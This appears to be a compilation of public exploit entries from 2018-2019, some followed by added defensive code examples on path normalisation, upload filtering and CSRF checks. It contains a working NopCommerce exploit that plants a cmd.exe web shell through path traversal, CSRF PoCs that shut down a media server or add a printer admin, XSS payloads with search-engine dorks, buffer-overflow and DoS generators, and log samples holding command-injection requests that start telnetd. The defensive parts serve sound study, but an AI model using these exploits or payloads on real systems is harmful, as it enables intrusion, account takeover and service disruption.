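    '10.0.0.7 - - [14/Dec/2019:10:00:01 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Dec/2019:10:00:02 +0000] "GET /cgi-bin/;date HTTP/1.1" 200 512 "-" "Python-urllib/2.7"',
    '10.0.0.9 - - [14/Dec/2019:10:00:03 +0000] "GET /cgi-bin/%3Btelnetd%20-p%204444 HTTP/1.1" 200 77 "-" "curl/7.64.0"',
    'not a log line at all',
    '10.0.0.7 - - [14/Dec/2019:10:00:04 +0000] "GET /start.htm HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.ts} {hit.src} -> {hit.injected!r} ({hit.path}, HTTP {hit.status})")
```

Matching on the decoded path rather than the raw one is the part that matters: a rule written against the literal string `/cgi-bin/;` misses the percent-encoded form that the device decodes identically.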
18. # Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
# Date: 2019-12-17
# Exploit Author: MTK
# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
# Software Link: https://www.zendesk.com/apps/support/survey/
# Version: Up to v1.6
# Tested on: Zendesk - Firefox/Windows

# Software description:
# The Sweet Hawk Survey app asks customers for a 0-10 score instead of the normal good or bad question.
# You can get more granular satisfaction data without compromising the response rate.
# Ask an optional NPS question on the landing page. View reports and drill down into the response
# detail and go directly to the ticket. Easy to set up, just replace the survey placeholder in
# your trigger or automation. Customize the landing pages for each of your brands.

# Technical Details & Impact:
# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server
# for later use. The payload is automatically served to users who browse web pages and executed in
# their context. Thus, the victims do not need to click on a malicious link to run the payload.
# All they have to do is visit a vulnerable web page.

# POC
1. Open a support ticket in Zendesk and send the XSS payload, e.g. <script>alert(1);</script>
2. Generate a survey request to rate the ticket and the payload will execute.

# Time line
09-19-2019 - Vulnerability discovered
09-20-2019 - Vendor contacted
12-02-2019 - Detailed report shared and full disclosure time line given with no response
12-17-2019 - Full Disclosure
19. # Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation
# Author: Alessandro Magnosi (d3adc0de)
# Date: 2019-07-07
# Vendor Homepage: https://www.nopcommerce.com/
# Software Link : https://www.nopcommerce.com/
# Tested Version: 4.2.0
# Vulnerability Type: Privilege Escalation
# Tested on OS: Windows 10, CentOS, Docker
# Exploit designed for: NopCommerce 4.2.0 on IIS

import requests
import argparse
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

# Browser-like User-Agent sent with every request to the admin file manager
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"


def proxy(flag):
    # Optional local intercepting proxy for debugging (-x)
    return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None


def geturl(baseurl, type):
    # RoxyFileman's 'd' parameter is a directory path; the '..%2F' segments walk out of
    # /images/uploaded into the application's Views folder
    if type == "login":
        return baseurl + "/login"
    elif type == "mv":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
    elif type == "mkdir":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
    elif type == "put":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
    elif type == "contactus":
        return baseurl + "/contactus"
    else:
        return ""


def login(email, password, url, proxy):
    # Fetch the anti-forgery token from the login form, then authenticate with it
    res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
    cookie = res.cookies.get_dict()
    soup = BeautifulSoup(res.text, features="html.parser")
    token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
    res = requests.post(geturl(url, "login"), cookies=cookie,
                        data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"},
                        proxies=proxy, verify=False, allow_redirects=False)
    cookies = res.cookies.get_dict()
    return { **cookies, **cookie }


def shellupload(email, password, url, proxy):
    print("[+] Trying uploading shell from")
    cookies = login(email, password, url, proxy)

    # Rename Common Directory
    requests.get(geturl(url, "mv"), headers={"User-Agent" : UA}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)

    # Create Common Directory
    requests.get(geturl(url, "mkdir"), headers={"User-Agent" : UA}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)

    # Upload File into Common (a Razor view with a cmd.exe wrapper, declared as image/png)
    requests.post(geturl(url, "put"),
                  headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760", "User-Agent" : UA},
                  data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n <input id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--",
                  proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)

    # Test if it is working: the replaced ContactUs view renders the shell's output span
    res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : UA}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    soup = BeautifulSoup(res.text, features="html.parser")
    test = soup.find("span", {"id" : "cmdResult"})
    if test is None:
        print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
    else:
        print("[+] Shell uploaded under contact us page")


def main():
    parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
    parser.add_argument('-e', '--email', required=True, type=str, help='Username')
    parser.add_argument('-p', '--password', required=True, type=str, help='Password')
    parser.add_argument('-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
    parser.add_argument('-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
    args = parser.parse_args()
    shellupload(args.email, args.password, args.url, proxy(args.proxy))


if __name__ == '__main__':
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    main()
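Two checks would have stopped the chain above: resolving the file manager's `d` parameter against the upload root before acting on it, and deciding what may be uploaded by file name rather than by the client-declared Content-Type (the PoC sends `ContactUs.cshtml` as `image/png`). The block below is an added example in Python, not nopCommerce or RoxyFileman code and not the fix the vendor shipped; the upload root path is an assumption chosen so the page's own `d` values can be run through it.

```python
import posixpath
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested directory resolves outside the upload root."""


# Extensions the file manager is meant to store; anything else is refused by name.
ALLOWED_EXTENSIONS = frozenset({".png", ".jpg", ".jpeg", ".gif"})


def resolve_upload_path(root: str, requested: str) -> str:
    """Map a client-supplied directory parameter (RoxyFileman's 'd') onto root.

    Decode exactly once (as the web framework does), refuse NULs and backslashes,
    treat the value as relative to root even when it starts with '/', collapse
    '.' and '..' with normpath, and only then check containment on the result.
    Grepping the raw string for '..' instead misses encoded and mixed forms.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    if "\\" in decoded:
        raise TraversalError("backslash in path")  # IIS treats it as a separator
    root_norm = posixpath.normpath(root)
    resolved = posixpath.normpath(posixpath.join(root_norm, decoded.lstrip("/")))
    if resolved != root_norm and not resolved.startswith(root_norm + "/"):
        raise TraversalError(f"{requested!r} resolves to {resolved}, outside {root_norm}")
    return resolved


def is_safe_dir(root: str, requested: str) -> bool:
    """Boolean form of resolve_upload_path for callers that only need a verdict."""
    try:
        resolve_upload_path(root, requested)
        return True
    except TraversalError:
        return False


def is_allowed_upload(filename: str, _declared_content_type: str) -> bool:
    """Decide by file extension alone.

    The declared Content-Type is attacker-chosen (the PoC labels a Razor view
    image/png), so it is deliberately ignored; only the name decides.
    """
    name = posixpath.basename(unquote(filename).replace("\\", "/"))
    return posixpath.splitext(name)[1].lower() in ALLOWED_EXTENSIONS


# Assumed upload root for the example; the 'd' values are the ones from the exploit above.
UPLOAD_ROOT = "/inetpub/wwwroot/nopcommerce/wwwroot"
RENAMEDIR_D = ("%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2F"
               "inetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f")
UPLOAD_D = "/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/"

if __name__ == "__main__":
    for d in ("/images/uploaded/2019/", RENAMEDIR_D, UPLOAD_D):
        print(f"{d!r:>90} -> {'allowed' if is_safe_dir(UPLOAD_ROOT, d) else 'REFUSED'}")
    print("ContactUs.cshtml as image/png ->", is_allowed_upload("ContactUs.cshtml", "image/png"))
```

Normalising before the containment test is the important ordering: a check that compares the unnormalised string against the root prefix passes `/images/uploaded/../../...` because it does begin with the expected prefix.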
20. # Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulnerability Type : Cross-Site Request Forgery (ShutDown)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
# been discovered that anonymous access can be achieved in applications that do
# not have a user login area and that the remote media server can be shut down.

# PoC Python Script :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

icon = """
 _____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7
|\__ / |_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/

Unauthenticated Remote Code Execution by Ismail Tasdelen
"""

print(icon)

# raw_input() returns the typed text as a string; under Python 2, input() would
# try to evaluate "192.168.1.1" as an expression and fail.
host = raw_input("[+] HOST: ")
port = raw_input("[+] PORT: ")

# You can also run the restart and update_check commands.
response = requests.get("http://" + host + ":" + port + "/" + "shutdown")

if response.status_code == 200:
    print('[✓] Success!')
else:
    print('[✗] Unsuccessful!')

# HTTP GET Request :

GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
21. # Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy, and a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)

# HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://XXX.XXX.XXX.XXX
Connection: close
Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1

NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="6&#44;1&#44;2" />
      <input type="hidden" name="limited" value="0" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="minLength" value="1" />
      <input type="hidden" name="maxLength" value="63" />
      <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
      <input type="hidden" name="isUserNameDisallowed" value="TRUE" />
      <input type="hidden" name="isNumberRequired" value="" />
      <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
      <input type="hidden" name="currentPage" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" />
      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;User&#95;Edit&#95;fn" />
      <input type="hidden" name="frmFriendlyName" value="Ismail&#32;Tasdelen" />
      <input type="hidden" name="frmUserName" value="ismailtasdelen" />
      <input type="hidden" name="frmNewPassword" value="Test1234&#33;" />
      <input type="hidden" name="frmRetypePassword" value="Test1234&#33;" />
      <input type="hidden" name="frmOldPassword" value="undefined" />
      <input type="hidden" name="SaveURL" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
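The two CSRF posts above show the two ways the defence fails: the Tautulli case exposes a state-changing action on a plain GET, and the Xerox PoC replays a captured `CSRFToken` from a third-party page. The following is an added example in Python, not code from Tautulli, Xerox or the exploit author, of the server-side check that catches both: refuse safe methods on mutating endpoints, require a same-origin Origin (or Referer), and compare the submitted token against the one bound to the submitting session in constant time. The `Request` type, hosts and tokens are constructed for the example; whether a real device accepts the replayed token depends on how it validates it, which is exactly what the third rule pins down.

```python
import hmac
from dataclasses import dataclass, field
from typing import Dict, Optional, Set
from urllib.parse import urlsplit

# Methods that may change server state; everything else must be side-effect free.
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


@dataclass
class Request:
    """Only the parts of an HTTP request a CSRF check needs (constructed, not a framework type)."""
    method: str
    url: str
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


def origin_of(url: str) -> str:
    """scheme://host[:port] of a URL, the granularity browsers use for the Origin header."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}"


def csrf_check(req: Request, site_origin: str, session_token: Optional[str],
               mutating_paths: Set[str]) -> str:
    """Return "ok" or a "refuse: ..." reason.

    1. A mutating endpoint must not be reachable with a safe method: an <img> or a
       GET <form> on a third-party page carries the victim's cookies (the /shutdown case).
    2. For state-changing methods the browser-set Origin (Referer as fallback) must be
       our own origin; a PoC page hosted elsewhere cannot forge either header.
    3. The submitted token must equal the token bound to *this* session, compared in
       constant time; a token copied from a captured request only replays if the
       server accepts it without tying it to the submitting session.
    """
    method = req.method.upper()
    path = urlsplit(req.url).path
    if path in mutating_paths and method not in STATE_CHANGING:
        return f"refuse: state-changing endpoint {path} reached with {method}"
    if method not in STATE_CHANGING:
        return "ok"  # safe method on a read-only endpoint
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if not source or origin_of(source) != site_origin:
        return f"refuse: cross-origin request (source {source!r})"
    submitted = req.form.get("CSRFToken", "")
    if not session_token or not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return "refuse: token does not match the session"
    return "ok"


if __name__ == "__main__":
    # Constructed stand-ins for the two captured requests above.
    media = "http://10.0.0.5:8181"
    shutdown = Request("GET", media + "/shutdown", {"Referer": media + "/home"})
    print(csrf_check(shutdown, media, None, {"/shutdown", "/restart"}))

    printer = "https://10.0.0.9"
    captured = "34cd705fa4b7954d"  # token lifted from an earlier capture (constructed)
    replay = Request("POST", printer + "/dummypost/xerox.set",
                     {"Origin": "https://attacker.example"},
                     {"CSRFToken": captured, "frmUserName": "ismailtasdelen"})
    print(csrf_check(replay, printer, "fresh-session-token", {"/dummypost/xerox.set"}))
```

Rule 1 is the cheapest fix for the Tautulli-style case, and it is independent of tokens entirely: once `/shutdown` only answers to POST, the `<form>` in the PoC cannot reach it without also passing rules 2 and 3.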
22. # Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC)
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.xnview.com
# Link Software : https://www.xnview.com/fr/xnview/#downloads
# Tested on OS: Windows 7

'''
Proof of Concept (PoC):
=======================
1. Download and install XnView
2. Open the XnView for Windows tools
3. Run the python script, which creates a file (poc.txt)
4. In the software, open "Tools -> Research"; a search window opens
5. Copy the characters from the file (poc.txt)
6. Paste the characters in the fields 'File Name' and 'In', then click on 'Research'
7. XnView for Windows crashes
'''

#!/usr/bin/python

# Malformed .snd (Sun audio) header followed by filler; pasted into the search fields
DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
     "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
     "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
     "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

poc = DoS

# Binary mode so the NUL bytes are written unchanged (the original had an unclosed
# quote in the filename, which is a syntax error)
file = open("poc.txt", "wb")
file.write(poc)
file.close()

print "POC Created by ZwX"
23. # Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.avs4you.com/
# Link Software : http://www.avs4you.com/avs-audio-converter.aspx
# Tested on OS: Windows 7

'''
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official AVS Audio Converter.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise
the local software process. The issue can be exploited by local attackers with system privileges
to compromise the affected local computer system. The vulnerability is marked as a classic buffer
overflow issue.

Analyze Registers:
==================
(1e74.1b78): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000
eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
42424242 ??              ???
0:000> !exchain
0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d)
0012fa30: 42424242
Invalid exception stack at 41414141

Note: EIP & ECX overwritten

Proof of Concept (PoC):
=======================
1. Download and install AVS Audio Converter
2. Open the AVS Audio Converter
3. Run the python script, which creates a file (poc.txt)
4. Copy and paste the characters found in the file (poc.txt) into the field "Exit folder"
5. Click on browse
6. EIP overwritten
'''

#!/usr/bin/python

buffer = "\x41" * 264   # filler up to the saved return address
a = "\x42" * 4          # lands in EIP (and ECX) per the register dump above
b = "\x43" * 1000       # trailing padding

poc = buffer + a + b

file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"
24. # Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368

Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.

PoC:

Payload: ?!'><sVg/OnLoAD=alert`1`//

Vulnerable URL: http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//

Solution: Update to the latest version released by vendor.
25. The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which unconditionally frees the fileproc and fileglob. This opens up a race window during which the process could manipulate those objects while they're being freed. Exploitation requires root privileges.

The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in the code:

static int
wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type)
{
	...
	error = falloc(p, &fp, &indx, ctx);
	if (error) goto cleanup;
	fp_alloc_successful = true;
	...
	proc_fdlock(p);
	procfdtbl_releasefd(p, indx, NULL);
	fp_drop(p, indx, fp, 1);
	proc_fdunlock(p);
	...
	error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t));
	if (error) goto cleanup;
	...
cleanup:
	if (error) {
		if (fp_alloc_successful) fp_free(p, indx, fp);
		...
	}

First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(), another thread in the process could access that file descriptor via another syscall, even while wait_for_namespace_event() is still running. This is problematic because in the error path wait_for_namespace_event() (reachable if copyout() fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free the fileproc, without taking into consideration whether the fileproc or fileglob are referenced anywhere else.

